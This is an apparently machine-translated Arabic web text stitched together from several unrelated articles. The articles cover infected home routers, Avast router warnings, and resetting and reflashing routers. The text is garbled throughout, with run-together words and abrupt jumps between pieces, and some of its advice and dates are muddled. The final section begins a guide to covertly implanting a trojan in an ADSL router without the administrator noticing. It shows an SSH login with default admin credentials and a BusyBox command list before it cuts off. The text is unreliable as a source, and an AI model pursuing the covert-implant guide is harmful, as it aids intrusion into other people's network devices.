عزيزي القراء. من أجل توفير وقتك. دعونا نتحدث عن الشيء الرئيسي على الفور. كل ما يلي يساعد في وجود أحصنة طروادة أو الفيروسات على الكمبيوتر لمدة 5-7 أيام. خلال هذه الفترة، يتم إرسال عمليات الفحص من الإنترنت، ولكن بعد الاختراق، يسود صمت مريب - لا توجد عمليات فحص - لم يعد جهاز التوجيه المصاب يسمح لهم بالدخول إلى جهاز الكمبيوتر، ويقبل الأوامر وينفذها. يؤثر هذا على سرعة الإنترنت - فهي تنخفض.
إذا كان جهاز التوجيه الخاص بك مصابًا بالفعل، فستحدث سرقة بروتوكول نقل الملفات (FTP) والبريد الإلكتروني وكلمات المرور الأخرى في المستقبل القريب.
بالفعل في عام 2009 أبلغ أحد الأشخاص DroneBL العالم عن وباء الفيروسات (البداية؟) الذي يصيب أجهزة التوجيه. ظهرت أخباره بعد الهجوم الذي تعرض له الموقع، حيث كشف مديرو هذا الموقع أن هذا نوع جديد بشكل أساسي بين هجمات Ddos. تم تنفيذ الهجوم بواسطة أجهزة توجيه مصابة. والآن، اكتسبت "عائلة" أجهزة كمبيوتر الزومبي إضافة جديدة - أجهزة توجيه الزومبي. تم اكتشاف شبكة الروبوتات التي تتكون من أجهزة التوجيه المنزلية المصابة! أطلقوا على هذه الشبكة اسم "psyb0t". هكذا بدأ وباء فيروس جهاز التوجيه رسميًا.
تحدث القرصنة عن طريق فحص منافذ جهاز التوجيه والسيطرة عليها. لسوء الحظ، هناك مقالات على الإنترنت حول مدى سهولة اختراق طراز جهاز التوجيه هذا أو ذاك. ولكن هناك يمكنك معرفة كيفية حماية نفسك من هذه الكارثة. بعد السيطرة على جهاز التوجيه، بدأ التجسس على محتويات حركة المرور. سرقة كلمة المرور. الانضمام إلى النشاط الخبيث العام لشبكات الروبوتات على شبكة الإنترنت العالمية. فحص المنافذ على جهاز الكمبيوتر المنزلي الخاص بك، ولكنني سأتناول المزيد من التفاصيل هنا. تمكن المؤلف من تتبع ذلك الوجود اتصال الشبكةإلى جهاز توجيه مخترق يؤدي إلى مثل هذه المشاكل. عند إعادة تثبيت جدار الحماية، تظهر الفيروسات من العدم في النظام. عند محاولة تثبيت Debian أو Ubuntu أثناء تنزيل التحديثات في نفس الوقت أثناء عملية التثبيت، لم يتم تثبيت هذه الأنظمة بشكل صحيح. وهي
- من المستحيل تشغيل Firestarter المثبت - يتم تشغيل الوظيفة الإدارية وهذا كل شيء. أي يتم إطلاق شيء بامتيازات المسؤول، ولكن ما هو غير معروف. Firestarter لن يبدأ.
- إذا كان هناك اتصال بالإنترنت، فلن يبدأ Deadbeef عند إيقاف تشغيل جهاز التوجيه، بل سيتم تشغيله على الفور.
- يتم تشغيل بعض التطبيقات التي تتطلب امتيازات المسؤول دون طلب كلمة مرور، والبعض الآخر لا يبدأ على الإطلاق.
- منذ كتابة هذا المقال، أصبحت هذه النقاط أقل وضوحا. وهذا يعني أنه ستكون هناك مشاكل، لكنها ستبدو مختلفة.
إعادة التثبيت على نفس الكمبيوتر، من نفسه قرص التثبيت، مع إيقاف تشغيل جهاز التوجيه، تم ذلك بنجاح. النظام (الذي تم اختباره على Ubuntu) يعمل كالساعة. وهذا ليس مفاجئًا، نظرًا لأن أجهزة التوجيه التي تعمل بنظام التشغيل Linux Mipsel كانت أول من تعرض للخطر. وبطبيعة الحال، فإن الضرر الذي يأتي من جهاز التوجيه الزومبي "أكثر تنوعًا" مما لاحظته ووصفته هنا، ولكن من في اللحظةنحن أغنياء، دعونا نتقاسمها...
"نجا" نظام التشغيل Windows المثبت (مع تعطيل جهاز التوجيه المصاب)، لكن Agnitum Outpost Firewall Pro اكتشف عمليات فحص المنافذ منذ الدقائق الأولى بعد التثبيت. أولئك. يقوم جهاز التوجيه بمهاجمة المنفذ (المنافذ).
أرز. فحص المنافذ الخاصة بي من الإنترنت وأخيراً من جهاز التوجيه المصاب.
كما ترون في الشكل، بتاريخ 27/04/2017 الساعة 23:51:16 تم إجراء المسح من جهاز التوجيه الزومبي. قبل ذلك، كانت هناك عمليات فحص من Kaspersky Security Network - 130.117.190.207 (لا "يحبها" جدار الحماية، ولكن هذا هو المعيار عند تثبيت Kaspersky) وليس من الواضح أين. وفي 27/04/12 تمت إعادة ضبط إعدادات جهاز التوجيه على إعدادات المصنع (Huawei HG530). ومنذ ذلك الحين، تنشأ فقط من Kaspersky Security Network - 130.117.190.207 وARP_UNWANTED_REPLY - وقد قام المؤلف بتمكين تصفية ARP. لذلك، فإن محاولات جهاز التوجيه "التحدث" مرة أخرى إلى جهاز الكمبيوتر (هذا هو النشاط الطبيعي لجهاز التوجيه - ولكن الآن يقوم Agnitum بتمرير استجابات ARP فقط التي تأتي استجابةً لطلب من جهاز الكمبيوتر الخاص بي)، بالإضافة إلى محاولات بعض الأفراد لاعتراض حركة المرور باستخدام استجابة ARP وهمية يتم حظرها بواسطة جدار الحماية. إذا اعترض شخص ما حركة المرور الخاصة بي بهذه الطريقة وتمريرها عبر جهاز الكمبيوتر الخاص به، فسأقوم بدور موظف مكتب يستخدم الإنترنت، بينما يرى مسؤول النظام في هذه المؤسسة جميع أفعالي، ويضع تقريرًا مفصلاً للرئيس . كم عدد الرسائل المكتوبة (لمن، حول ماذا)، كم عدد الأشخاص الذين تحدثوا على ICQ. وبالطبع كلمات مرور البريد الإلكتروني وما إلى ذلك. يمكنهم أيضًا سرقتها.
والنتيجة هي أنه منذ اللحظة التي قمت فيها بإعادة ضبط جهاز التوجيه الخاص بي وفعلت ما أصفه أدناه، لم تعد هناك هجمات من الإنترنت. لقد تم التخلص من "Gunner"، وأصبح جهاز التوجيه نظيفًا ويفعل فقط ما تم تصميمه من أجله. ولكن يجب أيضًا إزالة حصان طروادة الموجود على جهاز الكمبيوتر، وإلا فإنه سيقود المتسللين إلى عنوان IP الخاص بك.
أولئك الذين يصنعون معدات الشبكات لا يقدمون تدابير أمنية. تحتوي التعليمات الخاصة بأجهزة التوجيه على وصف لكيفية إدخال تسجيل الدخول وكلمة المرور للوصول إلى الموفر، ولكن لا توجد كلمة تفيد بأنه لا يمكن ترك كلمة مرور المسؤول الافتراضية في جهاز التوجيه! بالإضافة إلى ذلك، تحتوي أجهزة التوجيه بالضرورة على عناصر التحكم عن بعد، والتي غالبا ما يتم تضمينها. الشركات المصنعة لبرامج مكافحة الفيروسات صامتة. والسؤال الذي يطرح نفسه حتما هو من المستفيد من ذلك؟
طرق العدوى.
من الأفضل رؤيته مرة واحدة. لهذا السبب، أقدم صورة GIF متحركة مع تحليل تخطيطي للموقف. إذا لم يكن مرئيًا، فهذا يعني أن Adblock أو شيء مشابه يتداخل - قم بإيقاف تشغيله في هذه الصفحة.
هناك اثنان منهم. الأول هو عبر شبكة WAN، المعروفة أيضًا باسم الإنترنت. أولئك. يعثر المتسللون على عنوان IP الخاص بك، على سبيل المثال، عندما تقوم بتنزيل أو توزيع الملفات باستخدام بروتوكول التورنت (المزيد حول هذا في نهاية المقالة) ومن خلال فحص عنوان IP الخاص بك يجدون نقاط الضعففي حماية جهاز التوجيه. لكن هذا أقل شيوعًا. كيفية إغلاق هذه البوابات نقرأ المزيد في هذا المقال.
أو أن هناك حصان طروادة على جهاز الكمبيوتر الخاص بنا. ولذا فهو يقود المتسللين إلى عنوان IP الديناميكي (!) الخاص بنا. بمعرفة هذا العنوان، فإنهم يقومون بالفعل باختراق جهاز التوجيه بشكل منهجي. نقرأ عن أحصنة طروادة في الطريق الثاني للعدوى.
والثاني هو عبر الشبكة المحلية (LAN)، أي من جهاز الكمبيوتر الخاص بك. إذا كان هناك حصان طروادة على جهاز الكمبيوتر الخاص بك، فسيتمكن المتسللون من تخمين كلمة المرور لجهاز التوجيه مباشرة من جهاز الكمبيوتر الخاص بك. ولذلك، يجب تغيير كلمة المرور هذه في بعض الأحيان. ولكن ماذا عن حقيقة أن جهاز الكمبيوتر المصاب سيحاول اختراق جهاز التوجيه من جهة غير محمية؟ أولاً، عليك أن تفهم أن جهاز التوجيه النظيف المزود بجهاز كمبيوتر مصاب لن يستمر طويلاً. القوة الغاشمة العادية (تخمين كلمة المرور) سوف تكسرها في غضون أسبوع، أو حتى أسرع. لذا، إذا كان عليك تنظيف جهاز التوجيه الخاص بك بشكل متكرر، فقد حان الوقت للتفكير في تنظيفه بالكامل من الفيروسات.
والآن اللحظة. من أين يأتي الفيروس/حصان طروادة على جهاز الكمبيوتر؟ أدرج الأسباب والحلول الرئيسية بين قوسين. الخيارات هي:
1 - تم تثبيت Windows المتصدع في البداية (استخدم أقراص التثبيت الفارغة)؛
2 - تنظيف النوافذ بعد التثبيت (إما تحمله وإعادة تثبيته شهريًا أو شراء Windows)؛
3 - البرامج المكسورة (استخدام برامج مجانيةأو شراء واحدة مدفوعة الأجر)؛
4- لديك فيروس في ملفاتك الشخصية (قم بتشغيل كافة الملفات الشخصية عن طريق التنظيف كما شرحت في تنظيف النظام من الفيروسات)؛
5 - النظام مصاب بالفعل أثناء الاستخدام عبر محرك أقراص فلاش، الإنترنت، من يعرف كيف (الحماية - ندرس الإنترنت بأمان، حول محركات الأقراص المحمولة، حول النقطة الأخيرةسأصمت).
بشكل منفصل، أشير إلى أنه بعد اكتشاف عنوان IP الخاص بجهاز التوجيه، يبدأ المتسللون في فحصه للعثور على إمكانية الوصول إلى كلمة المرور المشفرة ومن ثم السيطرة باستخدام كلمة المرور المسروقة. لذا، لا تترك جهاز التوجيه قيد التشغيل إذا كنت لا تحتاج إلى الوصول إلى الإنترنت في الوقت الحالي.
لكن!!! حتى لو قمت بالتحميل باستخدام الآلة الافتراضية، سيبدأون في طرق جهاز التوجيه الخاص بك. سيساعد هنا تعطيله وإعادة تمكينه أثناء العملية، والشيء الرئيسي بعد الانتهاء من تنزيل التورنت هو أنه بعد إعادة تشغيل الموفر سيمنح جهاز التوجيه عنوان IP ديناميكيًا جديدًا وسيتعين على المتسللين فقط تخمين العنوان الذي أنت عليه الآن . وجهاز التوجيه الخاص بك أيضًا... بالطبع، لن تبقى لك عمليات التوزيع - بعد اكتمال التنزيل، يجب عليك إيقاف تشغيل برنامج تنزيل التورنت على الفور، وبعد ذلك، قم بإيقاف تشغيل جهاز التوجيه وتشغيله.
وبشكل عام
لا تبقي جهاز التوجيه قيد التشغيل إلا إذا كنت بحاجة لذلك! لا تسمح للمتسللين الصغار بالوصول إلى ممتلكاتك مرة أخرى... لا تنس تنظيف جهاز التوجيه الخاص بك في كل مرة تنخفض فيها سرعة الاتصال بالإنترنت بشكل غير معقول. الحذر لن يضر...
هذا كل شيء. الآن يمكنك أن تأخذ تعليمات المصنعإلى جهاز التوجيه الخاص بك وقم بالإشارة إلى معلومات تسجيل الدخول وكلمة المرور الصادرة عن مزود الإنترنت الخاص بك. يتم ذلك عادةً في علامة التبويب إعدادات WAN. لن تتمكن الآن من التحكم في جهاز التوجيه الخاص بك عبر الإنترنت. على الأقل في الوقت الراهن.
حتى وقت قريب، لم أكن أعلم حتى أن جهاز التوجيه Avast يخيف مستخدميه بتحذيرات "مخيفة" بخصوص أجهزة التوجيه الخاصة بهم. كما اتضح، يقوم برنامج Avast antivirus بفحص أجهزة توجيه Wi-Fi. يعطي نتائج مفادها أن جهاز التوجيه لم يتم تكوينه بشكل صحيح، أو أن الجهاز عرضة للهجمات، أو بشكل عام أن جهاز التوجيه مصاب ومصاب، وقد اعترض المهاجمون بالفعل عناوين DNS ويقومون بإعادة توجيهك بنجاح إلى المواقع الضارة، وسرقة البيانات بطاقات الائتمانوبشكل عام كل شيء سيء للغاية. كل هذه التحذيرات بالطبع متبلة بلون أحمر خطير وتعليمات مربكة لن يفهمها حتى المتخصص الجيد الذي لا يملك البيرة. أنا لا أتحدث حتى عن المستخدمين العاديين. هذا هو شكل المشاكل الموجودة على جهاز التوجيه D-Link DIR-615:
الجهاز عرضة للهجمات:
الحل بالطبع هو تحديث البرنامج الثابت لجهاز التوجيه. لأن ماذا أيضًا 🙂 يمكن لـ Avast أيضًا عرض رسالة مفادها أن جهاز التوجيه الخاص بك محمي بكلمة مرور ضعيفة، أو أن جهاز التوجيه غير محمي من الاختراق.
في بعض الحالات، قد تظهر لك رسالة مفادها جهاز التوجيه الخاص بك مصاب، ويتم إعادة توجيه الاتصالات إلى الخادم الضار. يشرح Avast antivirus ذلك بالقول إنه تم اختراق جهاز التوجيه الخاص بك وتم تغيير عناوين DNS الخاصة به إلى عناوين ضارة. وهناك تعليمات لحل هذه المشكلة لأجهزة التوجيه المختلفة: ASUS، TP-Link، ZyXEL، D-Link، Huawei، Linksys/Cisco، NETGEAR، Sagem/Sagemco.
باختصار، تهدف جميع هذه التوصيات إلى التحقق من عناوين DNS والخدمات المرتبطة بـ DNS. ومن خلالها يستطيع المهاجمون تغيير DNS الموجود على جهاز التوجيه الخاص بك وإعادة توجيهك إلى مواقعهم الضارة. هنالك تعليمات مفصلةكيفية التحقق من كل شيء على أجهزة التوجيه من مختلف الشركات المصنعة.
كيف ترد على تحذيرات Avast بشأن وجود ثغرة أمنية في جهاز التوجيه؟
أعتقد أن هذا السؤال يهم الجميع. خاصة إذا أتيت إلى هذه الصفحة. إذا كنت تتساءل كيف سأرد على مثل هذه التحذيرات من برنامج مكافحة الفيروسات، فالإجابة بسيطة - لا على الإطلاق. أنا متأكد من أن Avast كان سيعثر على ثغرات في جهاز التوجيه الخاص بي يمكن من خلالها اختراقي. لدي فقط Dr.Web. انه لا يفعل مثل هذه الشيكات.
ربما أكون مخطئا، ولكن لا يوجد برنامج مكافحة الفيروسات باستثناء الشيكات أفاست أجهزة توجيه واي فايالتي تتصل بها بأنواع مختلفة من نقاط الضعف. وظهرت هذه الميزة، التي تسمى Home Network Security، في عام 2015. في إصدار أفاست 2015.
يقوم Avast بفحص جهاز التوجيه الخاص بك بحثًا عن مشكلات أمان الجهاز. على الرغم من أنني لا أفهم تمامًا كيف يفعل ذلك. على سبيل المثال، كيف يمكن التحقق من نفس كلمة المرور لإدخال إعدادات جهاز التوجيه. هل يتبع المستخدم أم أنه طريقة اختيار؟ إذا خمنت ذلك، كلمة المرور سيئة 🙂 حسنًا، أنا لست مبرمجًا.
أنا شخصياً أعتقد أن كل هذه التحذيرات ليست أكثر من مجرد توصيات بسيطة لتعزيز أمان جهاز التوجيه الخاص بك. هذا لا يعني أن شخصًا ما قد اخترقك بالفعل ويسرق بياناتك. ما يقدمه أفاست:
- ثَبَّتَ كلمة مرور جيدةوتحديث البرنامج الثابت لجهاز التوجيه. يقولون خلاف ذلك قد يتم اختراقك. حسنًا، هذا واضح بالفعل. لا يجب الإشارة إلى هذا على أنه نوع من نقاط الضعف الرهيبة. على الرغم من أنني لا أفهم مرة أخرى كيف يحدد برنامج مكافحة الفيروسات أن إصدار برنامج جهاز التوجيه قديم. يبدو لي أن هذا مستحيل.
- جهاز التوجيه غير محمي من الاتصالات من الإنترنت. على الأرجح، يظهر هذا التحذير بعد التحقق المنافذ المفتوحة. ولكن بشكل افتراضي، يتم تعطيل وظيفة "الوصول من شبكة WAN" على جميع أجهزة التوجيه. أشك بشدة في أن أي شخص سيخترق جهاز التوجيه الخاص بك عبر الإنترنت.
- حسنا، أسوأ شيء هو استبدال عناوين DNS. إذا تم الكشف عن أي مشاكل في DNS، فإن Avast يكتب مباشرة أن "جهاز التوجيه الخاص بك مصاب!" لكن هذا ليس هو الحال في 99٪ من الحالات. مرة أخرى، دائمًا ما يتلقى جهاز التوجيه DNS تلقائيًا من الموفر. ويتم تعطيل جميع الوظائف والخدمات التي يمكن للمهاجمين من خلالها انتحال DNS بطريقة أو بأخرى بشكل افتراضي. يبدو لي أنه في كثير من الأحيان يسيء برنامج مكافحة الفيروسات فهم بعض إعدادات المستخدم.
شيء من هذا القبيل. وبطبيعة الحال، قد تختلف معي. يبدو لي أن الوصول مباشرة إلى الكمبيوتر وإصابته أسهل بكثير من القيام بذلك باستخدام جهاز التوجيه. إذا كنا نتحدث عن هجوم عبر الإنترنت. سأكون سعيدًا برؤية رأيك حول هذا الموضوع في التعليقات.
كيف تحمي جهاز التوجيه الخاص بك وتزيل التحذير من Avast؟
دعنا نحاول معرفة كل عنصر من المرجح أن يتحقق منه Avast ويصدر تحذيراته.
- جهاز التوجيه محمي بكلمة مرور ضعيفة. لا يوجد تشفير.في الحالة الأولى، يحتوي برنامج مكافحة الفيروسات على كلمة مرور يجب عليك إدخالها عند إدخال إعدادات جهاز التوجيه. عادةً ما تكون كلمة المرور الافتراضية هي admin. أو لم يتم تثبيته على الإطلاق. واتضح أن كل شخص متصل بشبكتك يمكنه الدخول إلى إعدادات جهاز التوجيه. ولذلك، يجب تغيير كلمة المرور هذه. كتبت كيفية القيام بذلك في المقال: . متعلق كلمة مرور الواي فايالشبكة، فيجب أيضًا أن تكون موثوقة، ويجب استخدام نوع التشفير WPA2. أكتب دائمًا عن هذا في تعليمات إعداد أجهزة التوجيه.
- جهاز التوجيه ضعيف بسبب البرامج القديمة.هذا ليس صحيحا تماما. ولكن، إذا كان طراز جهاز التوجيه الخاص بك موجودًا البرامج الثابتة الجديدة، فمن المستحسن تحديثه. ليس فقط لتحسين الأمان، ولكن أيضًا لتشغيل الجهاز بشكل أكثر استقرارًا ووظائف جديدة. لدينا تعليمات على موقعنا الإلكتروني لتحديث البرامج الخاصة بأجهزة التوجيه من شركات مصنعة مختلفة. يمكنك العثور عليه من خلال البحث أو السؤال في التعليقات. هنا هو ل.
- تم تغيير إعدادات DNS. تم اختراق جهاز التوجيه.بصراحة، لم أرى مثل هذه الحالات من قبل. كما كتبت أعلاه، يتم تعطيل جميع الخدمات التي يمكن أن يحدث من خلالها ذلك بشكل افتراضي. في أغلب الأحيان، يتلقى جهاز التوجيه DNS من الموفر تلقائيًا. الشيء الوحيد الذي يمكنني أن أنصح به هو عدم إدخال عناوين DNS التي لست متأكدًا منها يدويًا. وإذا قمت بتحديد العناوين يدويًا، فمن الأفضل استخدام DNS فقط من Google، وهو: . يوصى بهذا أيضًا في توصيات Avast، والتي يمكن الاطلاع عليها على الموقع الرسمي:. توجد تعليمات مفصلة لحل مشكلات DNS لجميع أجهزة التوجيه تقريبًا.
هذا كل شيء. آمل أن أكون قادرًا على توضيح هذه التحذيرات قليلاً على الأقل مضاد الفيروسات أفاست. اطرح الأسئلة في التعليقات، ولا تنسى المشاركة معلومات مفيدةحول هذا الموضوع. أطيب التمنيات!
مشاكل مع توزيع واي فاييحدث استخدام جهاز التوجيه لأسباب مختلفة. أحدها هو إصابة جهاز التوزيع بفيروس يمكنك التخلص منه بنفسك.
- فيروس يبطئ سرعة الإنترنت بطرق مختلفة. على سبيل المثال، مثل هذه الخبيثة برمجةيفسد إعدادات البرامج الثابتة أو يبدأ في تنزيل بعض محتويات الفيروسات الإعلانية على الكمبيوتر؛
- فيروس يحل محل عناوين مواقع الويب. يبدو الأمر كما يلي: يذهب المستخدم إلى أي موقع آمن معروف، ويقوم الفيروس بتغيير DNS بطريقة ينتهي بها الأمر بالمستخدم إلى موقع إعلاني أو يرى لافتات إعلانية حيث لم يضعها أصحاب الموقع. يعد مثل هذا الفيروس خطيرًا أيضًا لأنه يمكن أن يعيد توجيهك إلى موقع يحتوي على فيروسات أخرى.
على أية حال، إذا لاحظت أن جهاز التوجيه الخاص بك لا يعمل بشكل صحيح، فيجب عليك التحقق منه بحثًا عن الفيروسات، خاصة أنه من السهل جدًا التخلص منها.
كيف يدخل الفيروس إلى جهاز التوجيه؟
يوفر جهاز التوجيه الإنترنت لجميع الأجهزة المتصلة به. وهذا يعني أن جميع الأجهزة وجهاز التوجيه نفسه موجودان على نفس الشبكة المنزلية. وهذا هو ما يستفيد منه الفيروس: فهو يصل إلى جهاز الكمبيوتر من موقع ويب أو ملف تم تنزيله، ثم يتم نقله عبر الشبكة إلى جهاز التوجيه، حيث يبدأ في ممارسة الحيل القذرة. تعتمد العملية على طراز الفيروس، على سبيل المثال، بعض البرامج الضارة لا تكتشف نفسها على وجه التحديد على جهاز الكمبيوتر، ولكنها تبدأ في التصرف فقط بمجرد دخولها إلى جهاز التوجيه، بينما يتمكن البعض الآخر من التسبب في الضرر والتلف. نظام التشغيل، والبرامج الثابتة لجهاز التوجيه في نفس الوقت.
فحص جهاز التوجيه
قبل تنظيف جهاز التوجيه الخاص بك من الفيروسات، عليك التحقق مما إذا كان هناك أي فيروسات عليه. لمعرفة النتيجة، تحتاج إلى استخدام الإنترنت مباشرة من خلال جهاز الكمبيوتر الخاص بك. أي قم بإزالة كابل WLAN أو المودم من جهاز التوجيه وأدخله في منفذ الكمبيوتر، ثم اتبع الخطوات التالية:
إذا كنت تواجه مشاكل مع السرعة، فاتبع هذه الخطوات الثلاث.
- تحقق من سرعة الإنترنت لديك. يجب القيام بذلك لمعرفة ما إذا كانت السرعة هي نفسها في المستقبل عند استخدام الشبكة مباشرة ومن خلال جهاز التوجيه. على سبيل المثال، يمكنك تنزيل ملف أو استخدام خدمة Speedtest الخاصة عبر الإنترنت.
نقوم بفحص سرعة الإنترنت من خلال موقع Speedtest
- لتحديد جودة الإشارة بشكل أكثر دقة، تحتاج إلى معرفة مؤشر ping. Ping هو الوقت الذي يستغرقه إرسال الإشارة من جهازك والوصول إلى الخادم والعودة مرة أخرى. وبطبيعة الحال، كلما كان أكبر، كلما كان الأمر أسوأ بالنسبة لك. افتح سطر الأوامر، وأدخل الأمر ping ip وقم بتشغيله. عنوان IP الخاص باتصالك، عادةً ما يكون العنوان الافتراضي هو 192.168.0.1، ولكنه قد يختلف. تذكر النتيجة. تعد قيمة Ping العادية التي تصل إلى 40 مللي ثانية مؤشرًا ممتازًا، و40-110 مللي ثانية هي قيمة متوسطة عادية، أكثر من 110 مللي ثانية - يجدر التفكير في إعادة تكوين الشبكة أو تحسين الإشارة أو تغيير الموفر.
قم بتنفيذ الأمر ping ip
- بعد قائمة الطرود المرسلة، سترى الإحصائيات. أنت مهتم بسطر "الحزم"، فهو يحسب عدد الحزم التي تم إرسالها أو فقدانها أو إكمالها. إذا تجاوز عدد الحزم المفقودة 5%، فأنت بحاجة إلى معرفة ما هي المشكلة. إذا لم يصل عدد كبير من الحزم إلى الخادم أو لم يعودوا، فسيؤثر ذلك بشكل كبير على سرعة الإنترنت.
دعونا نرى ما هي النسبة المئوية للحزم المفقودة
بعد الانتهاء من جميع الخطوات المذكورة أعلاه، سوف تتلقى معلومات مفصلةحول اختبار ping وعدد الحزم المفقودة وسرعة الإنترنت، أعد توصيل كابل WLAN أو المودم بجهاز التوجيه وتحقق من نفس المؤشرات عند الاتصال عبر Wi-Fi. إذا كانت المعلمات على نفس المستوى تقريبًا، فإن المشكلة لا تكمن في جهاز التوجيه، وربما يكون السبب من جانب المشغل. خلاف ذلك، إذا حدثت مشاكل في الإنترنت فقط عند استخدامه من خلال جهاز توجيه، فأنت بحاجة إلى إعادة ضبط الإعدادات وتنظيفها من الفيروسات.
إزالة الفيروسات
لإزالة الفيروس، تحتاج إلى إعادة ضبط الإعدادات على القيم الافتراضية. إذا تمكن الفيروس من إتلاف البرنامج الثابت، فسيتعين عليك تثبيته مرة أخرى بنفسك.
إعادة ضبط الإعدادات
- ابحث عن زر إعادة الضبط في الجزء الخلفي من جهاز التوجيه. عادة ما يكون أصغر من كل الآخرين. يجب الضغط عليه لمدة 10-15 ثانية. عندما يتم إيقاف تشغيل جهاز التوجيه ويبدأ في إعادة التشغيل، يمكنك تحريره. ستؤدي إعادة تشغيل جهاز التوجيه إلى إعلامك بأنه قد تمت إعادة ضبط الإعدادات. يرجى الملاحظة تعيين كلمة المرورسوف تختفي أيضا.
اضغط على زر إعادة الضبط
- لإعادة تكوين جهاز التوجيه، تحتاج إلى توصيله بجهاز الكمبيوتر الخاص بك عبر الكابل، ثم افتح المتصفح الخاص بك وانتقل إلى http://192.168.0.1. ربما يكون العنوان مختلفًا؛ يمكنك العثور عليه على الملصق الموجود على جهاز التوجيه نفسه، أو في الوثائق المرفقة مع جهاز التوجيه. سيُطلب منك تسجيل الدخول وكلمة المرور، وتسجيل الدخول الافتراضي هو admin، وكلمة المرور هي admin أو 12345. مزيد من التفاصيل موضحة في التعليمات الخاصة بجهاز التوجيه.
- انتقل إلى الإعداد السريع. حدد الخيارات التي تناسبك. إذا أردت، قم بتعيين كلمة مرور وتغيير اسم الشبكة. بعد الانتهاء من إجراء الإعداد، احفظ التغييرات وأعد تشغيل جهاز التوجيه.
دعنا ننتقل إلى القسم " الإعداد السريع"وضبط الإعدادات المناسبة
بعد الانتهاء من جميع الخطوات المذكورة أعلاه، تحقق مما إذا كنت قد تخلصت من الخطأ. إذا لم يكن الأمر كذلك، فسيتعين عليك إعادة تحميل ملفات جهاز التوجيه يدويًا.
وامض جهاز التوجيه
لا تكون البرامج الثابتة لجهاز التوجيه ممكنة إلا إذا كان الجهاز متصلاً بالكمبيوتر عبر كابل. لا يمكنك تحديث البرنامج الثابت عبر شبكة Wi-Fi.
- يوجد ملصق على الجزء الخلفي من جهاز التوجيه. ابحث عن طراز جهاز التوجيه الخاص بك عليه. ويحتوي أيضًا على معلومات حول إصدار البرنامج الثابت المثبت في البداية. إذا كان الإصدار 7، فمن الأفضل تثبيت التحديث للإصدار 7 لتجنب التعارض بين البرامج الثابتة الجديدة جدًا والأجهزة القديمة لجهاز التوجيه.
تعرف على إصدار البرنامج الثابت وطراز جهاز التوجيه
- انتقل إلى موقع الشركة المصنعة واستخدم شريط البحث للعثور على الإصدار الصحيح للطراز الخاص بك. قم بتنزيله على جهاز الكمبيوتر الخاص بك.
ابحث عن إصدار البرنامج الثابت المطلوب وقم بتنزيله
- سيتم أرشفة الملف الذي تم تنزيله. قم باستخراج محتوياته إلى أي مجلد مناسب.
حدد المسار إلى البرامج الثابتة
- ابدأ إجراء التحديث وانتظر حتى ينتهي. أعد تشغيل جهاز التوجيه الخاص بك. يجب تحديث البرنامج الثابت، ومن المرجح أن تختفي جميع المشاكل والفيروسات.
في انتظار اكتمال التثبيت
فيديو: كيفية وميض جهاز التوجيه
كيفية حماية جهاز التوجيه الخاص بك من الفيروسات في المستقبل
الطريقة الوحيدة لحماية جهاز التوجيه الخاص بك من الفيروسات هي منعها من الدخول إلى جهاز الكمبيوتر الخاص بك. جهاز الكمبيوتر الخاص بك محمي باستخدام برنامج مكافحة الفيروسات. قم بتثبيت أي برنامج مكافحة فيروسات حديث ولا تقم بتعطيله تحت أي ظرف من الظروف. يكاد يكون من المستحيل اكتشاف البرامج الضارة باستخدام برنامج مكافحة فيروسات نشط. ليس من الضروري حتى استخدام برامج الأمان المدفوعة في الوقت الحاضر، فنظيراتها المجانية عالية الجودة كافية.
ماذا تفعل إذا لم يكن هناك شيء يساعد
إذا لم يؤد اتباع جميع التعليمات المذكورة أعلاه إلى النتيجة المرجوة، فهناك خياران متبقيان: تنشأ المشكلة بسبب تعطل الجزء المادي من جهاز التوجيه أو أخطاء من جانب المزود. أولاً عليك الاتصال بالشركة التي توفر لك خدمة الإنترنت وإخبارهم بمشكلتك والطرق التي لم تساعد في حلها. ثانيا يجب نقل الراوتر إلى خدمة خاصة حتى يتم فحصه من قبل المختصين.
تعد إصابة جهاز التوجيه بفيروس أمرًا نادرًا ولكنه خطير. هناك طريقتان للتخلص من الفيروس: عن طريق إعادة ضبط الإعدادات وتحديث البرنامج الثابت. تحتاج أيضًا إلى التأكد من عدم بقاء أي برامج ضارة على جهاز الكمبيوتر الخاص بك.
مرحباً بقارئي! في هذه المقالة سأتحدث عن أجهزة توجيه ADSL الرائعة
– قطع الحديد التي لا غنى عنها في الشبكات المنزلية والصناعية. سأخبرك عن السؤال
استغلال هذه الغدد لأغراض مفيدة لنا وهي الخياطة بطريقة وحشية
حصان طروادة داخل جهاز التوجيه. وبطريقة لا يلاحظها أحد
مدير ذكي وليس مستخدم ذكي.
رغبات أو متطلبات الذكاء
عندما كتبت هذا المقال، اعتقدت أن قراءته ستكون كافية
مستخدم متقدم مثبت عليه GNU\Linux، ولديه أيضًا بعض المهارات
العمل والبرمجة في نظام التشغيل هذا. ومع ذلك، على ما يبدو
من الممكن تكرار خطواتي على نظام التشغيل Windows (باستخدام Cygwin، على سبيل المثال)، ولكن
لن يتم وصف هذا. للحصول على أقصى قدر من المتعة تحتاج أيضا
مهارات لحام الحديد (هذا اختياري).
وبدأ كل شيء...
بطريقة ما لقد تشتت انتباهي. لذا، بدأ كل شيء عندما أغلق هذا الشخص الخط في أحد الأيام
قطعة من الأجهزة، أو بالأحرى، قطعت الاتصال بالإنترنت غدرًا ولم تفعل
أردت استعادته. وفي الوقت نفسه، كانت بعيدة، ويمكن الوصول إليها جسديًا
لم آت لرؤيتها (ومع ذلك، كنت أكذب بطريقة أو بأخرى - كنت كسولًا جدًا لدرجة أنني لم أتمكن من النهوض من الأريكة
أعد تشغيل جهاز التوجيه :))، ولم تستجب واجهة الويب، لكنني تذكرت ذلك
يجب أن يحتوي هذا الشيء على telnet أو ssh. تسجيل الدخول إلى منطقة الإدارة
لم أجربه من قبل ولم أغير كلمة المرور الخاصة بي بشكل متهور حساب(كيف
اتضح لاحقًا، عبثًا جدًا، لأنه افتراضيًا هو "admin:admin"). لذلك أنا
حاولت SSH وعملت!
$سش [البريد الإلكتروني محمي]
كلمة المرور $:
مفاجئ! صندوق مشغول! لم أفكر أبدًا في من تحته
اتضح أن هذا الموجه يتم التحكم فيه – جنو/لينكس! شعرت بالرعب
أتساءل كيف تسير الأمور هنا، وبفضل الكسل والصدفة ذهنيًا، تمكنت من ذلك
ذهب إلى البحث.
جمع المعلومات
إذن أين بدأت؟ بالطبع من قائمة الأوامر المتاحة:
#صندوق_مشغول
...
الوظائف المحددة حاليا:
[، ash، Busybox، cat، chgrp، chmod، chown، cp، date، dd، df، echo، false، free،
